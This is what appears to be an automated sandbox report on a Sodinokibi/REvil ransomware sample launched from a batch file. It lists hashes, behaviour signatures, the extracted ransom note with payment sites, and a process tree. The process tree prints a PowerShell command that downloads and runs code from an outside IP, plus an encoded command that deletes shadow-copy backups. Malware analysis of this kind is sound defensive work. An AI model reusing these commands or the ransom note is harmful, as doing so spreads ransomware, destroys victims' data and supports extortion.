Analysis

  • max time kernel
    149s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7v200213
  • submitted
    17-02-2020 15:10

General

  • Target

    QtxPGbas.bat

  • Size

    189B

  • MD5

    b896f6ff4553af50764dbf2c947a05bb

  • SHA1

    530bc65bb8cd23bf06865ddb93164f0c6348f578

  • SHA256

    f9366f629ed77ac92ea0a86a9f063f9a33f6cb37c03b8c094f4d74515b930412

  • SHA512

    32377669fab2cc36cd228ef46fc33f15d36d4ef2abdd7c3c93b253d8b7a520c697cc67b80c5bd8762d1b6bac18764adb97edeca3a08e7cd24316a84384405a85

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/QtxPGbas

Extracted

Path

C:\5cxg6z6j82-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 5cxg6z6j82. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A71438A36D561A11 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A71438A36D561A11 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: PgJYxh0nMLup4AvTfR/9IGaAYk8COA4KXo9JFnx1qEEOh9YkhHgG/w3frCRlUaKE MdAcobmH/QojbnWGR2bxfZTc1POA30dYeGBadkXHh/zavLawAqH7gBjUz3EF9dUG NapCDpQDQkEipjNBbCtYPPT/CelI2OC9wrAxWnuTvWALdReqyOObVL3Yf2IHabth jeuOLXpDvPrQpdEXzgULO/YxHUE20KNcR9cvoAiN0uyf2Id2vw1Go34XTylJ0uq+ v09fdu9YaA2Max18pDg/IVkmzWqy1P21XH97OtjCET/osSnrFBh8GUsjKDkMm4xC koJAwxMaUl+XkxnGC69V7ZNMZjkMBUo+DOQj5y6eNSADnQm57AIm2ajDlPLx+ckC /8Dt905mWv0o70zkMmUkj4yC/8/odKzUxyFI8LvuXsk8ryd2XdZ7h+dQxsDD6qyc dVli6jnrwrHqoUhGTsHYbyUW9zgViO6S88Ljwpce/EACPiG0pU59PO9a28tdI+rZ aUN+OOXdKGDoynSCrJtzzmICvrTK5DgO53hGfkQnT44f9+W8iMbw/YXR75GrnOL0 V+VuYxKdOP6L1SF7Ly/RFRBGNOXaXGUyhNpP0Bq7BQTpNZRW/i21ShtLwYCCOEYx UCY+u5hjYMVwb7WTgfbVluLL/Js3EgW3Raear+YcROGjnqGEtDG5nszdiYaf/oia J8+LjhMQtJXmZb3+7uxGaAyotIfhnXRD2Lhp+cu/Ahz97ccDSxOxxz+kB5SMiNON /c75CkoCW09kFozM0rt4ZALBPrrm7Buh+Az38aepKsTulLP3hVj4scMi3YiuuQFm xz1cfpUFIp1jT6Flhd5VBblz8EycrPGigoDaSXmc/USJ682ud6PmXR1pOeCii4eB upiEiXoSRg4ProkM/Tk9Wl0LIS1pT/uvQw3mYdkEEH/d506z7YlP2QRDc6soRwYW oyAQcT1ruJROhB7os57FePCzkBBFJ8vMouuibTbMtWl2F9bm0ArTELlerIT2ybMH 7WFCkyOPRNI46D+xWwOqLtKMmjb2+Nu2vbtadLsCOWaeNsEvKLv7pLr/rjnHeIpO zXBegs5Yyeh4BzkOMtZQqfEtKbU+dv3DgeogoxWW9yDiySmcGTQMYbKKIcWMOx/g 8Qaur4r6Ggu5D3fbokjiwPekde7nFmLGwytA+5R3nEgA8lYnSuD3yU+0/xEL2FTN p9GUWlaKZCIs4PcXEdvn7NIUfo0IAtX25ffhATzj7DQcjJPev1kuEsb+c+MtP98K lUuQ9VXXIxNfdBoOkD/RjfFugAy+2hMsW8RLb1vj9LHSy8P27aIB4w== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A71438A36D561A11

http://decryptor.cc/A71438A36D561A11

Signatures

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 9 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 37 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\QtxPGbas.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1984
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/QtxPGbas');Invoke-HGCAMJ;Start-Sleep -s 10000"
      2⤵
      • Sets desktop wallpaper using registry
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Suspicious use of AdjustPrivilegeToken
      • Drops file in System32 directory
      • Discovering connected drives
      PID:2008
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Discovering connected drives
        PID:852
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1700

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_269fc7d6-389e-41b0-b64b-7c0856c31fc7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_81674632-3ac2-413b-8a14-55e00bb0eca6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_aab85910-7ac3-4fc4-bbec-5e43e50581e6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d23a525b-13be-4981-917b-c14eaa6ecb8d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_da5c55b5-c1bb-4597-a419-36df000a20bd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e09b2a6a-d455-4170-a504-c8cdd16a5e67

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms